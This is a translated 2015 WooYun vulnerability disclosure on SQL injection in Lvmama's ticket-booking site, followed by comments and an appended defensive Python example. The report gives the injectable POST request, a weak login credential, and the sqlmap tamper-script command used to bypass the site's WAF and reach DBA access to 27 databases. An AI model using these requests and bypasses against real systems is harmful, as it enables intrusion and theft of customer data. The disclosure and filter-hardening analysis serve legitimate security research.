Vulnerability summary

Defect ID: wooyun-2015-0144854

Title: SQL injection on a Lvmama (驴妈妈旅游网) site (tamper scripts bypass the WAF / DBA privileges / 27 databases)

Vendor: 驴妈妈旅游网 (Lvmama)

Author: Xmyth_夏洛克

Submitted: 2015-10-05 09:51

Fix date: 2015-11-22 11:10

Published: 2015-11-22 11:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-05: Details sent to the vendor, awaiting vendor handling
2015-10-08: Vendor confirmed; details visible to the vendor only
2015-10-18: Details disclosed to core white hats and domain experts
2015-10-28: Details disclosed to regular white hats
2015-11-07: Details disclosed to intern white hats
2015-11-22: Details disclosed to the public

Brief description:

See title.

Detailed description:

Lvmama's old ticket-booking system: http://e.lvmama.com/ebooking/login.do

[Screenshot: 网站.png]

This site has had injection before:
"SQL injection in a Lvmama system allows dumping many databases (millions of customer, order and coupon records, etc.)"
"All Lvmama order information leaked", and so on.
There is a lot of data there, including a large amount of customer information, and the site has since added a WAF and other filtering.
First I found a working account, lvmama/123456.
After logging in, a round of testing turned up nothing at first; the injection was finally found in this input box.

[Screenshot: 注入页面_没报错.png]


A single quote in the field produces an error:

[Screenshot: 报错.png]


POST /ebooking/eplace/queryPassPort.do HTTP/1.1
Host: e.lvmama.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://e.lvmama.com/ebooking/eplace/queryPassPort.do
Cookie: JSESSIONID=2DAFEACDCFB6842381226DA4F72FA94C; uid=wKgKcFYCKIYO5y3EBiWJAg==; CoreID6=31035080103514429822001&ci=90409730;
__utma=30114658.668587984.1442982203.1443097311.1443859360.4; __utmz=30114658.1442982203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442982203,1443073015; tma=30114658.15709036.1442982214458.1443073018835.1443859361502.3; tmd=88.30114658.15709036.1442982214458.;
bfd_g=8a7bc81f66bd068d00000d6800522f5955b9c4a4; _lvTrack_UUID=EC5FD902-8675-4D0B-839C-61604B7CFCF6; __xsptplus443=443.1.1442982351.1442982351.1%234%7C%7C%7C%7C%7C
%23%230t256dYDWHuIjbJceH1Nm1zA8T-Ejs2i%23; __utmc=30114658; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1443859384; lvsessionid=5cbb21df-3c02-4695-8732-790569678feb_16053546;
vst_ebk_sessionid=261b0614-f635-4c92-9f84-d9cad9b12bb9
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
port_orderId=123&port_mobile=&port_userName=*&port_passPort=


The port_userName parameter is injectable.
sqlmap, however, could not extract any data. Going back to check, I found that the site filters the input, stripping spaces and some keywords.

[Screenshot: 过滤提示.png]


So I turned to tamper scripts to get past the filter: replacing spaces with /**/ and randomizing keyword case is enough to bypass it.

python sqlmap.py -r 1.txt --tamper between.py,space2comment.py,randomcase.py


space2comment.py replaces spaces with /**/; randomcase.py randomizes the case of keywords.

Proof of vulnerability:

Injection point

[Screenshot: 注入点.png]


27 databases

[Screenshot: dbs.png]


DBA privileges

[Screenshot: dba.png]


378 tables in the current database

web application technology: JSP
back-end DBMS: Oracle
Database: LVMAMA_SUPER
[378 tables]
(list of 378 table names omitted)


I did not go any further.

Fix recommendation:

Strengthen the filtering rules.
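As an added example (not part of the original report), the following Python shows why a blacklist that matches literal spaces and lower-case keywords is defeated by the space2comment and randomcase tampers named above, and what a stronger rule has to do first: normalize inline comments, whitespace and case before matching. The keyword list and sample inputs are constructed for illustration. Filtering is a mitigation only; the durable fix in the JSP application is a parameterized query (PreparedStatement) so that user input is never spliced into SQL text.

```python
import re

# Keyword blacklist mimicking the kind of filter the report describes.
# Constructed for this example; not the site's actual rule set.
BLOCKED_KEYWORDS = ("select", "union", "from", "where", "or", "and")


def naive_filter_blocks(value: str) -> bool:
    """The bypassable check: a literal space or a lower-case keyword substring.

    space2comment removes every literal space and randomcase changes keyword
    case, so this check sees neither."""
    if " " in value:
        return True
    return any(kw in value for kw in BLOCKED_KEYWORDS)


def normalize(value: str) -> str:
    """Canonicalise a parameter before rule matching.

    Inline comments (/* ... */) become a single space, whitespace runs are
    collapsed and the text is case-folded, so the tampered and untampered
    forms of a query fragment look the same to the rules."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"\s+", " ", value)
    return value.casefold().strip()


def normalized_filter_blocks(value: str) -> bool:
    """Keyword check on word boundaries after normalisation.

    Word boundaries also stop the rule from rejecting ordinary names such as
    'Morgan' that merely contain 'or' as a substring."""
    text = normalize(value)
    return any(re.search(rf"\b{re.escape(kw)}\b", text) for kw in BLOCKED_KEYWORDS)


# Constructed sample inputs: a fragment of the shape the two tampers produce,
# and an ordinary user name that contains a keyword as a substring.
TAMPERED = "zhang'/**/oR/**/1=1--"
BENIGN = "Morgan"

if __name__ == "__main__":
    for sample in (TAMPERED, BENIGN):
        print(repr(sample), "naive:", naive_filter_blocks(sample),
              "normalized:", normalized_filter_blocks(sample))
```

The naive rule misses the tampered input and wrongly blocks the benign name; the normalized rule gets both right.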

Copyright notice: please credit Xmyth_夏洛克@乌云 when reposting.


Vendor response

Vendor reply:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-10-08 11:08

Vendor comment:

thx

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-10-05 09:55 | 疯狗 certified white hat ( intern white hat | Rank:44 vulns:2 | Having read every vulnerability under heaven, the heart is naturally unclouded.)

    Bypass, bypass, bypass

  2. 2015-10-05 11:23 | Xmyth_夏洛克 ( regular white hat | Rank:1083 vulns:122 | can't do anything)

    @疯狗 2333333

  3. 2015-10-05 13:30 | 心云 ( intern white hat | Rank:58 vulns:23 | Encounter)

    The white hat you follow, Xmyth_夏洛克, posted a vulnerability: SQL injection on a Lvmama site (tamper scripts bypass the WAF / DBA privileges